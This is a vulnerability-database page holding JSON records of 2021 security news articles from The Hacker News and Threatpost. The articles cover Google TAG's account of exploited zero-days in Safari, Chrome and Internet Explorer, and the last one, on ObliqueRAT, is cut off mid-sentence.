DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:BBBFDA7EEE18F813A5DA572FD390D528", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Google Details iOS, Chrome, IE Zero-Day Flaws Exploited Recently in the Wild", "description": "[](<https://thehackernews.com/images/-xmPJ5TMTpac/YO_wfpf1LkI/AAAAAAAADM4/xSKsZYAbLBYJjYvNQilqUM9z0lf0Rx7_gCLcBGAsYHQ/s0/chrome.jpg>)\n\nThreat intelligence researchers from Google on Wednesday [shed more light](<https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/>) on four in-the-wild zero-days in Chrome, Safari, and Internet Explorer browsers that were exploited by malicious actors in different campaigns since the start of the year.\n\nWhat's more, three of the four zero-days were engineered by commercial providers and sold to and used by government-backed actors, contributing to an uptick in real-world attacks. The list of now-patched vulnerabilities is as follows -\n\n * [**CVE-2021-1879**](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>): Use-After-Free in QuickTimePluginReplacement (Apple WebKit)\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>): Chrome Object Lifecycle Issue in Audio\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>): Chrome Type Confusion in V8\n * [**CVE-2021-33742**](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>): Internet Explorer out-of-bounds write in MSHTML\n\nBoth Chrome zero-days \u2014 CVE-2021-21166 and CVE-2021-30551 \u2014 are believed to have been used by the same actor, and were delivered as one-time links sent via email to targets located in Armenia, with the links redirecting unsuspecting users to attacker-controlled domains that masqueraded as legitimate websites of interest to the recipients.\n\nThe malicious websites took charge of fingerprinting the devices, including collecting system information about the clients, before delivering a second-stage payload.\n\nWhen Google rolled out a patch for CVE-2021-30551, Shane Huntley, Director of Google's Threat Analysis Group (TAG), revealed that the vulnerability was leveraged by the same actor that abused CVE-2021-33742, an actively exploited remote code execution flaw in Windows MSHTML platform that was addressed by Microsoft as part of its [Patch Tuesday update](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) on June 8.\n\nThe two zero-days were provided by a commercial exploit broker to a nation-state adversary, which used them in limited attacks against targets in Eastern Europe and the Middle East, Huntley previously added.\n\n[](<https://thehackernews.com/images/--ol-CfJ3-bE/YO_tDkpfuNI/AAAAAAAADMw/bonGU0wpX_QzAsMNe5_Eh_0_Nb4OAma_QCLcBGAsYHQ/s0/zero-day.jpg>)\n\nNow according to a technical report published by the team, all the three zero-days were \"developed by the same commercial surveillance company that sold these capabilities to two different government-backed actors,\" adding the Internet Explorer flaw was used in a campaign targeting Armenian users with malicious Office documents that loaded web content within the web browser.\n\nGoogle did not disclose the identities of the exploit broker or the two threat actors that used the vulnerabilities as part of their attacks.\n\n## SolarWinds Hackers Exploited iOS Zero-Day\n\nThe Safari zero-day, in contrast, concerned a WebKit flaw that could enable adversaries to process maliciously crafted web content that may result in universal cross-site scripting attacks. The issue was rectified by Apple on March 26, 2021.\n\nAttacks leveraging CVE-2021-1879, which Google attributed to a \"likely Russian government-backed actor,\" were executed by means of sending malicious links to government officials over LinkedIn that, when clicked from an iOS device, redirected the user to a rogue domain that served the next-stage payloads.\n\nIt's worth noting that the offensive also mirrors a [wave of targeted attacks](<https://thehackernews.com/2021/05/solarwinds-hackers-target-think-tanks.html>) unleashed by Russian hackers tracked as Nobelium, which was found abusing the vulnerability to strike government agencies, think tanks, consultants, and non-governmental organizations as part of an email phishing campaign.\n\nNobelium, a threat actor linked to the Russian Foreign Intelligence Service (SVR), is also suspected of orchestrating the [SolarWinds supply chain attack](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>) late last year. It's known by other aliases such as APT29, UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), Dark Halo (Volexity), and Iron Ritual (Secureworks).\n\n\"Halfway into 2021, there have been [33 zero-day exploits](<https://googleprojectzero.github.io/0days-in-the-wild/rca.html>) used in attacks that have been publicly disclosed this year \u2014 11 more than the total number from 2020,\" TAG researchers Maddie Stone and Clement Lecigne noted. \"While there is an increase in the number of zero-day exploits being used, we believe greater detection and disclosure efforts are also contributing to the upward trend.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-07-15T08:25:00", "modified": "2021-07-15T12:45:33", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.8}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/07/google-details-ios-chrome-ie-zero-day.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-1879", "CVE-2021-21166", "CVE-2021-30551", "CVE-2021-33742"], "immutableFields": [], "lastseen": "2022-05-09T12:39:21", "viewCount": 348, "enchantments": {"dependencies": {"references": [{"type": "apple", "idList": ["APPLE:0F898F86D77B1E8D84FF7B933794464E", "APPLE:6F6ABDDC9804AE7A4086CB77C2D1EF4A", "APPLE:7BA0021A4788FB7533B47DE574B071E4"]}, {"type": "archlinux", "idList": ["ASA-202103-19", "ASA-202106-31", "ASA-202106-32", "ASA-202106-45", "ASA-202107-2"]}, {"type": "attackerkb", "idList": ["AKB:19A3B42A-68BD-48E1-847B-9BA88408EF2B", "AKB:732A3017-A62C-4347-9709-9B8790F47FA1", "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9", "AKB:FF274F38-9A0C-47ED-97B9-57C114AB1511"]}, {"type": "avleonov", "idList": ["AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0481", "CPAI-2021-0482", "CPAI-2021-0484", "CPAI-2021-0485"]}, {"type": "chrome", "idList": ["GCSA-3803715665928870837", "GCSA-6244807684233791030"]}, {"type": "cisa", "idList": ["CISA:F9916EF5EF9E126FF62CF4162B96669F"]}, {"type": "cve", "idList": ["CVE-2021-1879", "CVE-2021-21166", "CVE-2021-30551", "CVE-2021-33742"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4886-1:0EF07", "DEBIAN:DSA-4886-1:8DF2D"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-21166", "DEBIANCVE:CVE-2021-30551"]}, {"type": "fedora", "idList": ["FEDORA:10E2D309BE14", "FEDORA:6987B3049380", "FEDORA:75CA430AA7A6", "FEDORA:A017F3074280", "FEDORA:BF4FC30A0346", "FEDORA:C67773052A4D"]}, {"type": "freebsd", "idList": ["20B3AB21-C9DF-11EB-8558-3065EC8FD3EC", "F00B65D8-7CCB-11EB-B3BE-E09467587C17"]}, {"type": "gentoo", "idList": ["GLSA-202104-08", "GLSA-202107-06"]}, {"type": "github", "idList": ["GITHUB:D9472F716C46C02F88677DBAD0EEA334"]}, {"type": "githubexploit", "idList": ["55D44407-F5C9-50A9-B51D-0D4F668CD993"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "kaspersky", "idList": ["KLA12106", "KLA12107", "KLA12198", "KLA12202", "KLA12204", "KLA12205", "KLA12209"]}, {"type": "krebs", "idList": ["KREBS:E374075CAB55D7AB06EBD73CB87D33CD"]}, {"type": "mageia", "idList": ["MGASA-2021-0142"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55", "MALWAREBYTES:11D4071979D3FC1E6028AA8D71EB87F4", "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3", "MALWAREBYTES:D94336E4CB7536CC9CECC8C6FF696A77"]}, {"type": "mmpc", "idList": ["MMPC:6A79615935EB4546087AB44569C7B207"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21166", "MS:CVE-2021-30551", "MS:CVE-2021-33742"]}, {"type": "mssecure", "idList": ["MSSECURE:6A79615935EB4546087AB44569C7B207"]}, {"type": "nessus", "idList": ["APPLE_IOS_1252_CHECK.NBIN", "APPLE_IOS_1442_CHECK.NBIN", "DEBIAN_DSA-4886.NASL", "FEDORA_2021-4740239E28.NASL", "FEDORA_2021-C88A96BD4B.NASL", "FREEBSD_PKG_20B3AB21C9DF11EB85583065EC8FD3EC.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "GENTOO_GLSA-202104-08.NASL", "GENTOO_GLSA-202107-06.NASL", "GOOGLE_CHROME_89_0_4389_72.NASL", "GOOGLE_CHROME_91_0_4472_101.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "MACOSX_GOOGLE_CHROME_91_0_4472_101.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "MICROSOFT_EDGE_CHROMIUM_91_0_864_48.NASL", "OPENSUSE-2021-392.NASL", "OPENSUSE-2021-881.NASL", "OPENSUSE-2021-938.NASL", "OPENSUSE-2021-949.NASL", "SMB_NT_MS21_JUN_5003635.NASL", "SMB_NT_MS21_JUN_5003637.NASL", "SMB_NT_MS21_JUN_5003638.NASL", "SMB_NT_MS21_JUN_5003646.NASL", "SMB_NT_MS21_JUN_5003681.NASL", "SMB_NT_MS21_JUN_5003687.NASL", "SMB_NT_MS21_JUN_5003694.NASL", "SMB_NT_MS21_JUN_5003695.NASL", "SMB_NT_MS21_JUN_5003697.NASL"]}, {"type": "osv", "idList": ["OSV:DSA-4886-1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:5101CC734C1A900451E5994AFF57209A", "QUALYSBLOG:70AF718BCABA36D5847184CA639B55C9", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C"]}, {"type": "securelist", "idList": ["SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0392-1", "OPENSUSE-SU-2021:0401-1", "OPENSUSE-SU-2021:0881-1", "OPENSUSE-SU-2021:0938-1", "OPENSUSE-SU-2021:0948-1", "OPENSUSE-SU-2021:0949-1", "OPENSUSE-SU-2022:0110-1"]}, {"type": "thn", "idList": ["THN:080F85D43290560CDED8F282EE277B00", "THN:0D13405795D42B516C33D8E56A44BA9D", "THN:15BF409706D7240A5276C705732D745F", "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "THN:1DDE95EA33D4D9F304973569FC787451", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:4EFE9C3A3A0DEB0019296A14C9EAC1FA", "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "THN:62ECC5B73032124D6559355B66E1C469", "THN:6A9CD6F085628D08978727C0FF597535", "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "THN:B7217784F9D53002315C9C43CCC73766", "THN:BB8CDCFD08801BDD2929E342853D03E9", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:CDCF433A7837180E1F294791C672C5BB", "THN:D28CBE91134FEFC2BFDB69F581D44799", "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "THN:F197A729A4F49F957F9D5910875EBAAA"]}, {"type": "threatpost", "idList": ["THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:61CC1EAC83030C2B053946454FE77AC3", "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "THREATPOST:CF9E25BD324C5940B0795721CA134155", "THREATPOST:DE317ED7C5E4858FE861A15F96F6BCFD", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-21166", "UB:CVE-2021-30551"]}, {"type": "veracode", "idList": ["VERACODE:29632", "VERACODE:30949"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "apple", "idList": ["APPLE:0F898F86D77B1E8D84FF7B933794464E", "APPLE:6F6ABDDC9804AE7A4086CB77C2D1EF4A", "APPLE:7BA0021A4788FB7533B47DE574B071E4"]}, {"type": "archlinux", "idList": ["ASA-202103-19", "ASA-202106-31", "ASA-202106-32", "ASA-202106-45"]}, {"type": "attackerkb", "idList": ["AKB:19A3B42A-68BD-48E1-847B-9BA88408EF2B", "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9", "AKB:FF274F38-9A0C-47ED-97B9-57C114AB1511"]}, {"type": "avleonov", "idList": ["AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0481", "CPAI-2021-0482", "CPAI-2021-0484", "CPAI-2021-0485"]}, {"type": "chrome", "idList": ["GCSA-3803715665928870837", "GCSA-6244807684233791030"]}, {"type": "cisa", "idList": ["CISA:F9916EF5EF9E126FF62CF4162B96669F"]}, {"type": "cve", "idList": ["CVE-2021-1879", "CVE-2021-21166", "CVE-2021-30551", "CVE-2021-33742"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4886-1:0EF07"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-21166", "DEBIANCVE:CVE-2021-30551"]}, {"type": "fedora", "idList": ["FEDORA:10E2D309BE14", "FEDORA:6987B3049380", "FEDORA:A017F3074280", "FEDORA:BF4FC30A0346", "FEDORA:C67773052A4D"]}, {"type": "freebsd", "idList": ["20B3AB21-C9DF-11EB-8558-3065EC8FD3EC", "F00B65D8-7CCB-11EB-B3BE-E09467587C17"]}, {"type": "gentoo", "idList": ["GLSA-202104-08", "GLSA-202107-06"]}, {"type": "githubexploit", "idList": ["55D44407-F5C9-50A9-B51D-0D4F668CD993"]}, {"type": "kaspersky", "idList": ["KLA12106", "KLA12107", "KLA12198", "KLA12202", "KLA12204", "KLA12205", "KLA12209"]}, {"type": "krebs", "idList": ["KREBS:E374075CAB55D7AB06EBD73CB87D33CD"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55", "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3", "MALWAREBYTES:D94336E4CB7536CC9CECC8C6FF696A77"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/FREEBSD-CVE-2021-21159/", "MSF:ILITIES/GOOGLE-CHROME-CVE-2021-21166/", "MSF:ILITIES/GOOGLE-CHROME-CVE-2021-30551/", "MSF:ILITIES/SUSE-CVE-2021-21166/"]}, {"type": "mmpc", "idList": ["MMPC:6A79615935EB4546087AB44569C7B207"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21166", "MS:CVE-2021-30551", "MS:CVE-2021-33742"]}, {"type": "mssecure", "idList": ["MSSECURE:6A79615935EB4546087AB44569C7B207"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4886.NASL", "FEDORA_2021-4740239E28.NASL", "FEDORA_2021-C88A96BD4B.NASL", "FREEBSD_PKG_20B3AB21C9DF11EB85583065EC8FD3EC.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "GENTOO_GLSA-202104-08.NASL", "GOOGLE_CHROME_89_0_4389_72.NASL", "GOOGLE_CHROME_91_0_4472_101.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "MACOSX_GOOGLE_CHROME_91_0_4472_101.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "MICROSOFT_EDGE_CHROMIUM_91_0_864_48.NASL", "OPENSUSE-2021-392.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C"]}, {"type": "securelist", "idList": ["SECURELIST:BB0230F9CE86B3F1994060AA0A809C08"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0392-1", "OPENSUSE-SU-2021:0401-1", "OPENSUSE-SU-2021:0881-1", "OPENSUSE-SU-2021:0938-1", "OPENSUSE-SU-2021:0948-1", "OPENSUSE-SU-2021:0949-1"]}, {"type": "thn", "idList": ["THN:0D13405795D42B516C33D8E56A44BA9D", "THN:15BF409706D7240A5276C705732D745F", "THN:1DDE95EA33D4D9F304973569FC787451", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:4EFE9C3A3A0DEB0019296A14C9EAC1FA", "THN:62ECC5B73032124D6559355B66E1C469", "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:CDCF433A7837180E1F294791C672C5BB", "THN:D28CBE91134FEFC2BFDB69F581D44799", "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "THN:F197A729A4F49F957F9D5910875EBAAA"]}, {"type": "threatpost", "idList": ["THREATPOST:61CC1EAC83030C2B053946454FE77AC3", "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "THREATPOST:CF9E25BD324C5940B0795721CA134155", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-30551"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-1879", "epss": "0.001740000", "percentile": "0.527760000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21166", "epss": "0.026870000", "percentile": "0.887900000", "modified": "2023-03-17"}, {"cve": "CVE-2021-30551", "epss": "0.335030000", "percentile": "0.963600000", "modified": "2023-03-17"}, {"cve": "CVE-2021-33742", "epss": "0.822710000", "percentile": "0.977990000", "modified": "2023-03-17"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1659988328, "score": 1698842854, "epss": 1679098904}, "_internal": {"score_hash": "2d8b4cf0215e1ffeb63756910ccf921b"}}

{"threatpost": [{"lastseen": "2021-07-15T11:25:30", "description": "Threat actors used a Safari zero-day flaw to send malicious links to government officials in Western Europe via LinkedIn before researchers from Google discovered and reported the vulnerability.\n\nThat\u2019s the word from researchers from Google Threat Analysis Group (TAG) and Google Project Zero, who Wednesday [posted a blog](<https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/>) shedding more light on several zero-day flaws that they discovered so far this year. Researchers in particular detailed how attackers exploited the vulnerabilities\u2014the prevalence of which are on the rise\u2013before they were addressed by their respective vendors.\n\nTAG researchers discovered the Safari WebKit flaw, tracked as [CVE-\u200b2021-1879](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1879>), on March 19. The vulnerability allowed for the processing of maliciously crafted web content for universal cross site scripting and was addressed by Apple in [an update](<https://support.apple.com/en-us/HT212256>) later that month.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nBefore the fix, researchers assert Russian-language threat actors were exploiting the vulnerability in the wild by using LinkedIn Messaging to send government officials from Western European countries malicious links that could collect website-authentication cookies, according to the post by Maddie Stone and Clement Lecigne from Google TAG.\n\n\u201cIf the target visited the link from an iOS device, they would be redirected to an attacker-controlled domain that served the next-stage payloads,\u201d they wrote.\n\nThe exploit, which targeted iOS versions 12.4 through 13.7, would turn off [Same-Origin-Policy](<https://en.wikipedia.org/wiki/Same-origin_policy>) protections on an infected device to collect authentication cookies from several popular websites\u2013including Google, Microsoft, LinkedIn, Facebook and Yahoo\u2013and then send them via WebSocket to an attacker-controlled IP, researchers wrote. The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated.\n\nMoreover, the campaign targeting iOS devices coincided with others from the same threat actor\u2014which Microsoft has identified as Nobelium\u2013targeting users on Windows devices to deliver Cobalt Strike, researchers wrote. Security firm Volexity described one of these attacks [in a report](<https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/>) posted online in May, the researchers added.\n\nNobellium is believed to be a Russia-based threat group responsible for the [expansive cyber-espionage SolarWinds](<https://threatpost.com/feds-russia-culprit-solarwinds/162785/>) campaign, which affected numerous U.S. government agencies and tech companies, including Microsoft.\n\n## **Other Zero-Day Attacks**\n\nGoogle researchers also linked three additional zero-day flaws they identified this year to a commercial surveillance vendor, according to [Google TAG\u2019s Shane Huntley](<https://twitter.com/ShaneHuntley/status/1415340345500463113>). Two of those vulnerabilities\u2013[CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>) and [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>)\u2014were found in Chrome, and one, tracked as [CVE-2021-33742](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33742>), in Internet Explorer.\n\nCVE-2021-21166 and CVE-2021-30551, two Chrome rendered remote-code execution (RCE) flaws, were identified separately but later believed to be used by the same actor, researchers wrote in the blog. Google researchers discovered the former in February and the latter in June.\n\n\u201cBoth of these 0-days were delivered as one-time links sent by email to the targets, all of whom we believe were in Armenia,\u201d Stone and Lecigne wrote. \u201cThe links led to attacker-controlled domains that mimicked legitimate websites related to the targeted users.\u201d\n\nWhen prospective victims clicked the link, they were redirected to a webpage that would fingerprint their device, collect system information about the client, and generate ECDH keys to encrypt the exploits, researchers wrote. This info\u2014which included screen resolution, timezone, languages, browser plugins, and available MIME types\u2014would then be sent back to the exploit server and used by attackers to decide whether or not an exploit should be delivered to the target, they said.\n\nResearchers also identified a separate campaigned in April that also targeted Armenian users by leveraging CVE-2021-26411, an RCE bug found in Internet Explorer (IE). The campaign loaded web content within IE that contained malicious Office documents, researchers wrote.\n\n\u201cThis happened by either embedding a remote ActiveX object using a Shell.Explorer.1 OLE object or by spawning an Internet Explorer process via VBA macros to navigate to a web page,\u201d Stone and Lecigne explained.\n\nAt the time, researchers said they were unable to recover the next-stage payload, but successfully recovered the exploit after discovering an early June campaign from the same actors. Microsoft patched the flaw later that month, they said.\n\n\n\nClick to Zoom CREDIT: TAG\n\n## **Why There is an Increase in Zero-Days?**\n\nAll in all, security researchers have identified 33 [zero-day flaws](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) so far in 2021, which is 11 more than the total number from 2020, according to the post.\n\nWhile that trend reflects an increase in the number of these types of vulnerabilities that exist, Google researchers \u201cbelieve greater detection and disclosure efforts are also contributing to the upward trend,\u201d they wrote.\n\nStill, it\u2019s highly possible that attackers are indeed using more [zero-day exploits](<https://threatpost.com/zero-day-wipe-my-book-live/167422/>) for a few reasons, researchers noted. One is that the increase and maturation of security technologies and features means attackers also have to level up, which in turn requires more [zero-day vulnerabilities](<https://threatpost.com/solarwinds-hotfix-zero-day-active-attack/167704/>) for functional attack chains, they said.\n\nThe growth of mobile platforms also has resulted in an increase in the number of products that threat actors want to target\u2014hence more reason to use zero-day exploits, researchers observed. Perhaps inspired by this increase in demand, commercial vendors also are selling more access to zero-days than in the early 2010s, they said.\n\nFinally, the maturation of security protections and strategies also inspires sophistication on the part of attackers as well, boosting the need for them to use zero-day flaws to convince victims to install malware, researchers noted.\n\n\u201cDue to advancements in security, these actors now more often have to use 0-day exploits to accomplish their goals,\u201d Stone and Lecigne wrote.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-15T11:04:49", "type": "threatpost", "title": "Safari Zero-Day Used in Malicious LinkedIn Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1879", "CVE-2021-21166", "CVE-2021-26411", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-07-15T11:04:49", "id": "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "href": "https://threatpost.com/safari-zero-day-linkedin/167814/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-10T20:47:57", "description": "Google is warning that a bug in its Chrome web browser is actively under attack, and it is urging users to upgrade to the latest 91.0.4472.101 version to mitigate the issue.\n\nIn all, Google rolled out fixes for 14 bugs impacting its Windows, Mac and Linux browsers as part of its June update [to the Chrome desktop browser](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html>).\n\n\u201cGoogle is aware that an exploit for CVE-2021-30551 exists in the wild,\u201d wrote Chrome technical program manager Prudhvikumar Bommana [in a Wednesday post](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html>). That exploit is identified as a type confusion bug within Google\u2019s V8 open-source JavaScript and WebAssembly engine. \n[](<https://threatpost.com/newsletter-sign/>)The confusion vulnerability is tied to the browser\u2019s ActionScript Virtual Machine. \u201cUsually, when a piece of code doesn\u2019t verify the type of object that is passed to it, and uses it blindly without type-checking, it leads to type confusion,\u201d according to a [technical description of the bug](<https://www.microsoft.com/security/blog/2015/06/17/understanding-type-confusion-vulnerabilities-cve-2015-0336/#:~:text=The%20vulnerability%20is%20a%20%E2%80%9Ctype,it%20leads%20to%20type%20confusion.>).\n\n## **Possible Wider Impact of Exploited Chrome Browser Bug **\n\nThe update coincides with the release of the Android Chrome browser to Chrome 91 (91.0.4472.101), also [on Wednesday](<https://chromereleases.googleblog.com/2021/06/chrome-for-android-update_01297860997.html>). While the desktop and mobile versions of the Chrome web browser share the same version number, it is unclear if the updated Android Chrome browser is impacted by the same vulnerabilities.\n\nAlso unclear is if Microsoft\u2019s Edge browser, based on the Chromium open-source browser codebase (principally developed and maintained by Google), is also impacted.\n\nIn related news, on Tuesday, Microsoft released a patch for vulnerabilities under active attack, including [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>), impacting its Edge browser. That bug [is a remote-code execution](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) (RCE) vulnerability within the Edge browser\u2019s MSHTML component.\n\n\u201cThe MSHTML platform is used by Internet Explorer mode in Microsoft Edge as well as other applications through WebBrowser control,\u201d Microsoft explained.\n\n## **Critical Browser Cache Bug: CVE-2021-30544**\n\nAs part of the June Chrome update, Google patched a critical use-after-free bug (CVE-2021-30544) within the browser\u2019s optimization engine called BFCache. This browser component enables back-and-forward navigation between cached webpages within Chrome.\n\nAs customary with recently disclosed bugs, Google did not release the details tied to any of the vulnerabilities patched Wednesday. \u201cAccess to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third-party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d the Google advisory stated.\n\nGoogle credits Rong Jian and Guang Gong of 360 Alpha Lab for finding the BFCache bug in May. For their bug hunting efforts, the pair earned $25,000.\n\n**Download our exclusive FREE Threatpost Insider eBook, ****_\u201c_**[**_2021: The Evolution of Ransomware_**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)**_,\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and **[**DOWNLOAD**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)** the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-06-10T20:07:53", "type": "threatpost", "title": "Chrome Browser Bug Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0336", "CVE-2021-30544", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-06-10T20:07:53", "id": "THREATPOST:DE317ED7C5E4858FE861A15F96F6BCFD", "href": "https://threatpost.com/chrome-browser-bug-under-attack/166804/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-03T22:09:38", "description": "The ObliqueRAT malware is now cloaking its payloads as seemingly-innocent image files that are hidden on compromised websites.\n\nThe remote access trojan (RAT), which has been operating since 2019, spreads via emails, which have malicious Microsoft Office documents attached. Previously, payloads were embedded into the documents themselves. Now, if users click on the attachment, they\u2019re redirected to malicious URLs where the payloads are hidden with steganography.\n\nResearchers warn that this new tactic has been seen helping 